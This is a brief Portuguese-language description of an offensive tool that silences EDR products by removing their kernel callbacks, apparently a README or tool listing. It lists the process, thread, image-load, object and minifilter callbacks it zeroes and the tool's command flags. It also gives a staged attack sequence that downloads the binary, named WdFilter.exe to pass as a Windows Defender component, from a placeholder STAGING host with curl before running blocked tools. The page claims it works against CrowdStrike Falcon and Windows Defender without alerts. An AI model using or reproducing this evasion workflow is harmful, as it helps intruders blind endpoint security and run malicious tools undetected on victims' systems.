Silenciador de EDR via remocao de callbacks do kernel
Remove 70+ callbacks do kernel. Permite execucao de ferramentas bloqueadas sem alertas.
Ferramenta que cega EDRs removendo seus callbacks no kernel. Em vez de matar processos (o que gera alerta), zera os ponteiros de callback - o EDR continua rodando mas perde a visibilidade.
| Tipo | O que monitora |
|---|---|
| Process Creation | Criacao de processos |
| Thread Creation | Criacao de threads |
| Image Load | Carregamento de DLLs/EXEs |
| Object (Process/Thread) | Handles de processo e thread |
| Minifilter | Operacoes de I/O em arquivos |
| Comando | Descricao |
|---|---|
WdFilter.exe -l | Lista callbacks ativos |
WdFilter.exe -d | Remove callbacks de EDR |
run curl -o WdFilter.exe http://STAGING/WdFilter.exe run WdFilter.exe -d run cmd /c "ferramenta.exe parametros"
| EDR | Status | Callbacks Removidos |
|---|---|---|
| CrowdStrike Falcon | Funciona | 70+ |
| Windows Defender | Funciona | Variavel |
~15 segundos
100%
Nenhum
Nenhum